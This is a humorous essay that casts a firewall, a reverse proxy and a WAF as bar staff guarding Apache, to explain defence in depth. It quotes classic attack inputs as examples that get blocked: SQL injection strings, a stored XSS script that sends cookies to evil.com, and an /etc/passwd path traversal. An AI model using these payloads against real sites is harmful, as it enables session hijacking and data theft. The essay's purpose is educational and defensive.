The barman is Apache. Things get complicated.
Dramatis Personae
- Apache: Tired barman. Serves HTTP. Just wants to deliver drinks without getting pwned.
- Firewall: The bouncer. Old school. Judges people entirely by their shoes (port numbers).
- Proxy: The mysterious middleman. Wears a trenchcoat. Everyone talks to him instead of Apache.
- WAF:The paranoid sommelier. Reads every drink order three times looking for SQL.
It was a quiet Tuesday evening at The Open Port, a bar famous for its 24/7 uptime and surprisingly loose CORS policy. Apache was polishing glasses behind the counter, running on port 80 (and secretly port 443 when he was feeling fancy), when the door swung open and in walked three regulars.
Firewall went in first. He always went in first.
Act I: Firewall β The Bouncer Who Only Reads Name Tags
Firewall is what you might call a simple man. He stands at the door and checks two things: where you came from, and what door you knocked on. Port 22? You look shifty. Port 3389 from a Russian IP range? Absolutely not. Port 80? Come on in, friend β I don’t know you at all but the number checks out.
This is fine, mostly. One evening a ne’er-do-well named π§ Nikolai Portscan tried rattling every door in the building in sequence β 1, 2, 3, 4 β looking for something unlocked. Firewall spotted the pattern immediately and dropped the connection. “Sorry son,” he said, not looking up from his clipboard, “we don’t do sequential port scans here.” Nikolai shuffled off into the darkness, muttering about nmap flags.
But here’s the thing about Firewall: he’s brilliant at the door and absolutely useless once you’re inside. His entire worldview is Layer 3 and 4. IP addresses. Port numbers. Protocols. Once someone is through the door with a valid ticket, Firewall considers his job done. He retires to a stool and watches football.
This is how a villain named π Mallory Request walked in one evening. She had a perfectly legitimate port-80 knock, a cheerful “GET / HTTP/1.1”, and tucked inside her handbag, a payload that read:
GET /search?q=1' OR '1'='1
A classic SQL injection. Mallory had been doing this since 2003 and considered it practically vintage at this point.
Firewall waved her through. Port 80, clean IP, proper handshake β what was there to complain about? Apache, poor Apache, looked at Mallory’s order and started dutifully relaying it to the database. This is when things could have gone very wrong. This is also when the WAF stepped in β but we’ll get to her.
Act II: Proxy β The Middleman With Trust Issues
Proxy never let anyone talk to Apache directly. This was not rudeness; it was a philosophy. “Apache,” Proxy explained once, over a warm glass of TLS 1.3, “is a precious resource. A sensitive soul. He doesn’t need to know who’s really asking.”
Proxy sat between the world and Apache, collecting all requests, stripping out personal details, forwarding things along, and handing back responses as if he’d made them himself. To the outside world, the bar’s address was Proxy’s address. Apache didn’t even show up on the seating chart.
This came in tremendously useful when a distributed menace known as π€ The Mirai Grandchildren arrived β a botnet of 40,000 compromised smart toasters, fridges, and at least one sad Roomba, all hammering the bar with HTTP requests simultaneously in a DDoS attack of breathtaking scale.
The Mirai Grandchildren had done this to many establishments. Usually, the server collapsed under the load like a tired soufflΓ©.
Not here. Proxy looked at the 40,000 incoming connections, yawned, and began load-balancing them across a cluster. Rate limits kicked in. Suspicious IPs got CAPTCHAs. The toasters β identifiable by their suspiciously uniform User-Agent strings β were quietly handed a 429 and told to come back later. Apache, blissfully unaware, continued serving drinks to the twelve or so legitimate customers who’d gotten through, none the wiser.
“Isn’t it exhausting, pretending to be everyone?” Apache asked Proxy once.
“I’m a reverse proxy,” Proxy replied. “Pretending to be everyone is literally the job description.”
What Proxy couldn’t do, however, was read the menu. He was brilliant at managing who was talking to Apache, but he took orders at face value. Which brings us to the evening’s real hero.
Act III: WAF β The Paranoid Sommelier
The Web Application Firewall is, charitably, a highly anxious professional. She had read the OWASP Top 10 so many times she could recite it as a lullaby. She trusted no one. She read every drink order like it was a ransom note.
When π§ͺ Bobby Tables Jr. walked in β son of the infamous Robert’); DROP TABLE Students;– β he handed over what appeared to be a perfectly ordinary drink order: a GET request to /login with a username field that happened to contain ' UNION SELECT password FROM users--.
Bobby had been doing this professionally for years. He’d cleaned out entire customer databases with worse. He waited for the familiar sound of query results tumbling out.
WAF looked at the order. Then looked at it again. Then cross-referenced it against her ModSecurity ruleset, the OWASP Core Rule Set v3.3, and her own personal feelings about unsanitized input. She set it down on the bar.
“This order,” she announced, “contains a UNION SELECT.”
“It’s just my name,” Bobby said, sweating slightly.
“Your name,” WAF replied, “has a double dash at the end. That’s a SQL comment delimiter. You’re trying to truncate a query. I’ve seen this since PHP 4.” She handed him a 403 Forbidden and a glass of water. Bobby left.
WAF was similarly unmoved when πΈοΈ Xavier Cross-Site tried to order a drink with a name that read <script>document.location='https://evil.com/?c='+document.cookie</script>. This was a stored XSS attack β Xavier’s plan was to get that script saved in the bar’s database, so that every future customer who viewed the menu would automatically hand over their session cookies to evil.com.
“You’ve HTML-encoded nothing,” WAF observed flatly, “and your exfiltration URL is not even HTTPS. Embarrassing.”
Xavier, a man who had once stolen sessions from a Fortune 500, felt shame for the first time in years.
Things got briefly exciting when ποΈ Patricia Traversal asked for something from the cellar using the path ../../../../etc/passwd β a path traversal attack so old it was practically artisanal. WAF blocked it without looking up. “Directory traversal attempts get normalized and rejected,” she said, refilling her coffee. “This has been standard since 2001. Patricia, I’ve blocked you fourteen times this month.”
“Worth a shot,” Patricia muttered, and left through a side door that was, thankfully, also monitored.
Epilogue: A Balanced Ecosystem
At closing time, Firewall, Proxy, and WAF sat down at the bar. Apache poured three drinks and leaned on the counter.
“You know,” Apache said, “some nights I wonder what would happen if only one of you showed up.”
“Without me,” said Firewall, “Nikolai Portscan would have found the MongoDB port you left open in 2019 and still haven’t closed.”
Apache said nothing. The MongoDB port was a sensitive subject.
“Without me,” said Proxy, “your real IP address would be public, the Mirai Grandchildren would have your home address, and you’d have collapsed under your third DDoS by February.”
“And without me,” said WAF, producing a stack of blocked request logs roughly the thickness of a novel, “your user database would belong to Bobby Tables Jr., your admin panel would be running Xavier’s cryptominer, and Patricia Traversal would be reading your /etc/shadow file as bedtime reading.”
Apache looked at the three of them. He looked at the logs. He looked at the small laminated sign above the bar that read “defence in depth” β a phrase he’d never fully appreciated until this moment.
“Same time tomorrow?” he asked.
“We never left,” said WAF.
No actual web servers were harmed in the writing of this essay. The author recommends running all three in production. Firewall alone is not a security strategy; it is a starting point, and a humble one. Also, please close your MongoDB port.
